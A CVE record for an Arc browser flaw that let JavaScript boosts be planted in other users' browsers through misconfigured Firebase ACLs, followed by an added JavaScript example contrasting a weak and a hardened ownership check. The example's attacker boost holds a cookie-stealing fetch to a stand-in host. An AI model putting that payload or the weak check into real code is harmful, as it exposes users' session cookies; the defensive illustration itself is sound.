CVE-2024-45489

Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however (because of misconfigured Firebase ACLs), it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary JavaScript on that browser in a privileged context. NOTE: this is a no-action cloud vulnerability with zero affected users.
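The defect class the description names is a write-side access-control check that verifies the caller is signed in but not that the caller owns the record it is writing, so a boost can be stored under another user's ID and synced to that user. The following is an added illustration, not Arc's code and not a reconstruction of its Firebase rules: an in-memory stand-in for the boosts collection with the weak check beside the hardened one, run over a constructed attacker/victim scenario. The owner field name `creatorID`, the `uid` claim and the boost shape are assumptions; in a real Firebase deployment the equivalent ownership condition belongs in the security rules evaluated by Firebase, not in client code.

```javascript
// Added example, not code from Arc or from Firebase. Field names (creatorID,
// uid, site, js) and the boost shape are assumptions made for illustration.

// Constructed stand-in for the server-side boosts collection.
const boosts = new Map();

// Weak check: any signed-in caller may create or update any boost, including
// one whose owner field names a different user. This is the class of defect
// the CVE description calls a misconfigured Firebase ACL.
function vulnerableCanWrite(auth, existing, incoming) {
  return auth !== null && typeof auth.uid === 'string';
}

// Hardened check: the caller must be signed in, the document being written must
// name the caller as owner, and if a document already exists under that ID the
// caller must own it too (otherwise an attacker could overwrite a victim's boost
// or re-own it). Equivalent, in Firestore rules terms, to comparing
// request.auth.uid against the owner field of both request.resource and resource.
function hardenedCanWrite(auth, existing, incoming) {
  if (auth === null || typeof auth.uid !== 'string') return false;
  if (incoming.creatorID !== auth.uid) return false;
  if (existing !== null && existing.creatorID !== auth.uid) return false;
  return true;
}

// Store the boost if the supplied policy allows it; returns whether it was written.
function writeBoost(canWrite, auth, boostId, incoming) {
  const existing = boosts.has(boostId) ? boosts.get(boostId) : null;
  if (!canWrite(auth, existing, incoming)) return false;
  boosts.set(boostId, { ...incoming });
  return true;
}

// Constructed scenario: a victim creates a benign boost; an attacker then tries
// to (1) create a JavaScript boost owned by the victim, (2) overwrite the
// victim's existing boost, (3) re-own the victim's boost, and (4) write while
// unauthenticated.
function runScenario(canWrite) {
  boosts.clear();
  const victim = { uid: 'vic-9' };
  const attacker = { uid: 'att-1' };
  const benign = { creatorID: victim.uid, site: 'example.com', js: "document.body.style.zoom = '1.1'" };
  const malicious = { creatorID: victim.uid, site: 'example.com', js: "fetch('https://attacker.invalid/?c=' + document.cookie)" };

  const victimCreate = writeBoost(canWrite, victim, 'boost-1', benign);
  const attackerCreateAsVictim = writeBoost(canWrite, attacker, 'boost-2', malicious);
  const attackerUpdateVictimDoc = writeBoost(canWrite, attacker, 'boost-1', malicious);
  const attackerTakeover = writeBoost(canWrite, attacker, 'boost-1', { ...malicious, creatorID: attacker.uid });
  const anonymousCreate = writeBoost(canWrite, null, 'boost-3', malicious);

  return {
    victimCreate,
    attackerCreateAsVictim,
    attackerUpdateVictimDoc,
    attackerTakeover,
    anonymousCreate,
    storedOwnerOfBoost1: boosts.get('boost-1').creatorID,
  };
}

console.log('vulnerable:', runScenario(vulnerableCanWrite));
console.log('hardened:  ', runScenario(hardenedCanWrite));
```

With the weak check every attacker write succeeds and boost-1 ends up owned by the attacker; with the hardened check only the victim's own create succeeds. The point to carry over to a real rules file is that the owner comparison has to run on both the incoming document and the existing one, on update as well as on create.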
Configurations

No configuration.

History

26 Sep 2024, 13:32

Type: Summary
Values Added:
  • (es, translated) Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however (due to misconfigured Firebase access control lists), it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary JavaScript in that browser in a privileged context. NOTE: this is a cloud vulnerability that requires no action and affects no users.

20 Sep 2024, 19:15

Type: References
Values Added:
  • https://arc.net/blog/CVE-2024-45489-incident-response

Type: Summary
Values Removed:
  (en) Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however, it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary Javascript on that browser in a privileged context.
Values Added:
  (en) Arc before 2024-08-26 allows remote code execution in JavaScript boosts. Boosts that run JavaScript cannot be shared by default; however (because of misconfigured Firebase ACLs), it is possible to create or update a boost using another user's ID. This installs the boost in the victim's browser and runs arbitrary Javascript on that browser in a privileged context. NOTE: this is a no-action cloud vulnerability with zero affected users.

20 Sep 2024, 18:35

Type: CWE
Values Added: CWE-284

Type: CVSS
Values Removed: v2 : unknown; v3 : unknown
Values Added: v2 : unknown; v3 : 9.8

20 Sep 2024, 17:15

Type: New CVE

Information

Published : 2024-09-20 17:15

Updated : 2024-09-26 13:32


NVD link : CVE-2024-45489

Mitre link : CVE-2024-45489

CVE.ORG link : CVE-2024-45489

Products Affected

No product.

CWE
CWE-284

Improper Access Control